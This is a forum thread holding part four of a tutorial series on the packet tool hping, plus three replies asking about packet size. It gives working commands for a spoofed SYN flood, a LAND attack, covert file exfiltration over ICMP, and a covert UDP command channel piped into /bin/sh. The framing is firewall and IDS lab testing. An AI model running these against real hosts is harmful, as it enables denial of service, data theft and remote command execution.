HPING - Haxoris Maximus. Tut 4 in Series of 5
Results 1 to 4 of 4

Thread: HPING - Haxoris Maximus. Tut 4 in Series of 5

  1. #1
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883

    HPING - Haxoris Maximus. Tut 4 in Series of 5

    PREFACE:
    =================================================
    I'd like to start by saying that I will be covering many of the basic functions along with examples and explanations why you would want to use the tool in each scenario. In addition, I will hit on several advanced features for those who are familiar with the tool but not to the point where advanced knowledge of the application is grasped. I will be borrowing verbage (in some cases) from the developer because I feel that the developer has worded things in such ways that I cannot improve upon. By no means is this a cut & paste tutorial but I would like to make everyone aware that I will be borrowing info where it makes sense. For those who have been around here for awhile, you know that I preface my tutorials with this advanced warning in the event that someone finds a sentence or two from the original man pages for the app.

    Advanced Techniques: Tutorial IIII
    =================================================
    This tutorial will go into advanced features that HPING offers. Note that *any* of the following information can be used to take down hosts and possibly destroy information if misused. Always practice on lab hosts. I assume no responsibility for damages of *any* kind that may result in the use/misuse of the following information. By continuing to read this tutorial, you agree to use the information at your own risk.

    NOTE: Real word switches require a "double dash" instead of a single. Because I wrote this in word, they sometimes get fux0red when I paste in the content. Keep this in mind if an example doesn't work for you on the first try.


    Firewall Mapping: Traceroute/Firewalk Style
    =================================================
    HPING can be used much like traceroute or firewalk only you can use TCP, UDP or ICMP packets. Let’s take a look at a TCP example…

    NOTE: I have doctored the results heavily for example purposes.

    [root@HorseyLand-Labs]#hping –V –I eth0 –bind –t 4 –S www.yahoo.com –p 666

    -I allows you to select the NIC used
    -- bind sets the ttl count to the ctrl + z key combo so that each time you hit ctrl + z the ttl increases
    -t sets the initial ttl value in the header
    -S SYN flag set
    -p port

    HPING www.yahoo.com (eth0 216.109.117.109): S set, 40 headers + 0 data bytes
    TTL 0 during transit from ip=10.10.10.1
    7: TTL 0 during transit from ip=207.96.37.198


    Once you reach your destination, you’ll see something like this:

    len=46 ip=216.109.117.109 flags=SA DF seq=33 ttl=47 id=0 win=5840 rtt=4341.3
    ms



    HPING: The DoS King
    =================================================

    The point of this section is to give you a tool to test out IDS/Firewall appliances as well as router/switch ACLs. Any numb nut can launch a DoS. Only a professional can solve the issue when discovered.

    ** The SYN Attack **

    WARNING: THIS CAN BRING DOWN A HOST. DO NOT USE THIS AGAINST A PRODUCTION HOST.

    In the next example, we will use the –a switch to spoof the source address of the attacking host. This is to avoid sending a RST packet from the attacking host.

    [root@HorseyLand-Labs]#hping –a 10.10.10.3 –S 10.10.10.10 –p 80 –i u10000

    You can set the packet per second rate using the –i (interval) switch. You can take a shortcut and use –fast and it will use 10000 microseconds which equates to 10 packets a second. You will not see *any* response on your host because the return traffic is going to the spoofed host. Keep in mind, this can either piss off the person whos address you spoofed or cause your net admin to have a stroke. Also, the target host may go down depending upon how fast and how many packets you send.

    On our W2K3 host, we see a blizzard of SYN Received messages.

    C:\netstat –an –p tcp

    Active Connections

    Proto Local Address Foreign Address State
    .
    TCP 10.10.10.10:80 10.10.10.3:2555 SYN_RECEIVED
    TCP 10.10.10.10:80 10.10.10.3:2556 SYN_RECEIVED
    TCP 10.10.10.10:80 10.10.10.3:2557 SYN_RECEIVED

    **SNIPPED** for brevity


    Notice that the Foreign Address is the spoofed address you specified with the –a switch.

    ** LAND DoS Attack **

    The idea behind this is quite simple – craft a packet that will connect a socket to itself. The result, if successful will cause the box to consume all of its resources and ultimately a DoS condition occurs. This test is also VERY effective when testing spoofing rules on a firewall. Simply craft a packet using the –a switch and aim it at a host in the DMZ or internal LAN. Of course this assumes that you have this information (legitimately of course). Check and see if the firewall dropped the illegal packets. If not, start writing ACLs!!

    Let’s try it out…

    [root@HorseyLand-Labs]#hping -S -a 10.10.10.10 -p 21 10.10.10.10
    HPING 10.10.10.1 (eth0 10.10.10.1): S set, 40 headers + 0 data bytes


    Again, you’ll see no response for reasons which should be very obvious by now. Most systems wont fall victim to this (like NT did) anymore but again, it is very helpful in firewall rule testing.


    Payload (Signatures): The True Art of Packet Crafting
    =================================================

    We’re going to look at ways to use (misuse) HPING with an actual payload. The first example will deal with UDP payloads.

    Fire up any editor and create a file with some kind of text. In my example, I created a file named payload.txt with the content of HAXOR. The file resides in the same directory where I am running HPING.

    [root@HorseyLand-Labs]#hping -2 –p 7 –d 50 –E payload.txt 10.10.10.10

    -2 puts HPING in UDP mode
    -d specifies data length
    -E tells HPING to use a signature from the specified file. The file can reside anywhere, however, you’ll need to use absolute paths (i.e. /root/data/haxorfiles/filename.tx) if the file isn’t in your current working directory.

    Ethereal capture of the packet:

    0000 00 a0 c9 df ff 84 00 c0 4f 48 aa 72 08 00 45 00 ........ OH.r..E.
    0010 00 4e db e8 00 00 40 11 3d d1 ac 1d 04 3b ac 1d .N....@. =....;..
    0020 04 70 04 34 00 35 00 3a a7 90 48 41 58 4f 52 0a .p.4.5.: ..HAXOR.
    0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
    0040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........
    0050 00 00 00 00 00 00 00 00 00 00 00 00 ........ ....

    As you can see, this could get very ugly with a little time and imagination. While I have given you enough information to be dangerous, I have not given you enough to be an outright menace. You’ll have to practice with the items learned in this series and before long, you’ll know exactly what I mean.


    HPING: File Transfers Made Easy
    =================================================

    Up until now, you have learned how to use HPING for testing purposes, but it has a whole set of addition features – file transfer.

    The listen feature will put hping in listen mode for a specific signature. The signature is simply a string for which hping will listen and parse everything in a packet after this signature. You can specify for what protocol (ICMP, UDP and TCP) to listen for. Our example will use ICMP, You can experiment with TCP and UDP if you like. One *important* thing I will mention is that HPING doesn’t give a **** what is listening on a port. So if you play with TCP transfers, be sure that you don’t bind it to a port in use otherwise, like a true vagrant, it will squat on that port and grab/send traffic until told otherwise.

    Step one: Setup the listener: There are two ways to do this. The safe way, where you setup HPING to listen for data from a specific host or you can listen for traffic from any host. The safe method is achieved with the ever so surprising –safe switch. However, we wont be using this method.

    On the listening host: NOTE: “signature” refers to shared secret. It must be the same on the listening host and transferring host.

    [root@HorseyLand-Labs]#hping –I eth0 --listen signature --icmp
    hping2 listen mode


    On the transferring host:

    [root@CrackHouse]#hping –I eth0 –icmp –d 100 –sign signature –file /home/example

    NOTE: The –d switch is important. Be sure it is large enough because this is the value HPING uses to determine data size.

    Now, on your listenig host, you will see the following appear (remember, this is the content of my file)

    [root@HorseyLand-Labs]#hping –I eth0 --listen signature --icmp
    hping2 listen mode

    Wow, this is a nice way
    To steel information if
    The admin is asleep at
    The wheel. I sure hope
    That important information
    Such as credit card #s
    Aren’t in this file.


    As you can see, the evil possibilities are endless.


    HPING: A Trojan in disguise?
    =================================================

    There is a file transfer technique that I did not cover in detail which will allow HPING to be set in a full duplex channel across stateless filters. This is achieved with using the –SA switch along with a TCP transfer. You are quite capable of setting this up with the knowledge gained thus far but because this is on AO, I cannot post the precise instructions. Anyway, let’s assume that we were able to set this connection up. You can execute commands on the remote machine. Yep, you read correctly.

    I’ll simply provide the commands.

    Local machine:
    [root@HorseyLand-Labs]#hping –I eth0 --listen signature --udp -p 53 |/bin/sh
    hping listen mode:


    Remote Machine:
    [root@CrackHouse]# echo ls >watchthis.cmd
    [root@CrackHouse ]# hping 192.168.10.44 -p 53 -d 100 --udp --sign
    siganature --file ./watchthis.cmd


    The result will be a directory listing of the remote machine appears on your local machine:

    [root@HorseyLand-Labs]#hping –I eth0 --listen signature --udp -p 53 |/bin/sh
    hping listen mode:
    ettercap-NG-0.7.0_pre1/
    hping2-rc2/
    nmap-3.50/
    snmp\
    capture.bmp
    netsed/
    perl-study/
    tcpdump-3.8.3/
    nikto-1.32/
    slackforce.jpg
    test/

    Again, the possibilities are endless.

    Well that wraps up tutorial 4. In the final installment, we will examine countermeasure techniques so that you can once again sleep at night!

    Well, what do all think so far?
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  2. #2
    Antionline's Security Dude instronics's Avatar
    Join Date
    Dec 2002
    Posts
    901
    Excellent and lots of lovely details. This is going straight into my 'thehorse13' tutorial collection along with the other excellent tutorials.

    Keep going
    Cheers.
    Ubuntu-: Means in African : "Im too dumb to use Slackware"

  3. #3
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    Nice work Hoss....

    In the file transfer portion your description implies that the transfer is limited to a packet size. ie: all the data must be in the same packet and the listener needs to know how big that packets data segment will be.

    Two questions:

    Actually three....

    1. Am I right in that assumption?
    2. Can the file be split across packets?
    3. If you are trying to move a file that is large "ish" in terms of packet size isn't this going to be affected by some router's MTU settings for example or will HPing deal with any packet fragmentation?
    Don\'t SYN us.... We\'ll SYN you.....
    \"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools.\" - Thucydides

  4. #4
    Master-Jedi-Pimps0r & Moderator thehorse13's Avatar
    Join Date
    Dec 2002
    Location
    Washington D.C. area
    Posts
    2,883
    2. Can the file be split across packets?
    Yes, a file can be split across packets. The switch is setting data size by packet.

    3. If you are trying to move a file that is large "ish" in terms of packet size isn't this going to be affected by some router's MTU settings for example or will HPing deal with any packet fragmentation?
    No, because you can certainly control MTU with HPING.



    Perhaps I should reword that section...
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •